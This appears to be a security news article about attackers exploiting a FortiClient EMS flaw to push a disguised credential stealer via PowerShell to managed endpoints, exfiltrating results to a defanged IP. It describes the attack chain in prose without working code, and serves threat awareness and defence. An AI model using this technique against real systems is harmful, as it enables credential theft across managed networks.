Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer
Threat Actors Exploit Critical FortiClient EMS Flaw to Deploy Credential Stealer
https://thehackernews.com/2026/05/threat-actors-exploit-critical.html
Publish Date: 2026-05-28 11:26:00
Source Domain: thehackernews.com
Threat actors are continuing to exploit a critical, now-patched security flaw impacting FortiClient Endpoint Management Server (EMS) deployments to deliver credential-stealing malware.
“The campaign abused trusted endpoint management infrastructure to deliver malware across managed endpoints,” Arctic Wolf said. “Threat actors disguised the credential stealer payload as a Fortinet endpoint update, silently executing the malicious executable through PowerShell.”
The activity, observed by the cybersecurity company in May 2026, involves the exploitation of CVE-2026-35616 (CVSS score: 9.1), a critical pre-authentication API access bypass leading to privilege escalation. The issue was addressed by Fortinet in FortiClient EMS 7.4.7 and later.
A successful compromise is followed by the threat actor taking steps to modify configurations to defer firmware upgrade reminders, as well as modifying a Remote Access Profile configuration and endpoint policy to insert a malicious script for execution on endpoint devices.
“The observed execution pattern suggests that threat actors used FortiClient’s own management pathway to push malicious PowerShell commands to managed endpoints in a way that resembled legitimate management operations,” Arctic Wolf said.
“Once the threat actors had a route to modify EMS-managed configuration, every managed endpoint became a potential execution target without requiring a separate intrusion path to each device.”
In addition, the attack has been found to leverage “fortitray.exe,” a legitimate executable associated with FortiClient to launch a .cmd script file using “cmd.exe.” The .cmd script is designed to invoke a Base64-encoded PowerShell script that, in turn, is responsible for downloading a malicious payload, running it, and exfiltrating the results to “83.138.53[.]110” via an HTTP POST request.
The executable, named “FortiEndpoint_Patch.exe,” masquerades as an update,…
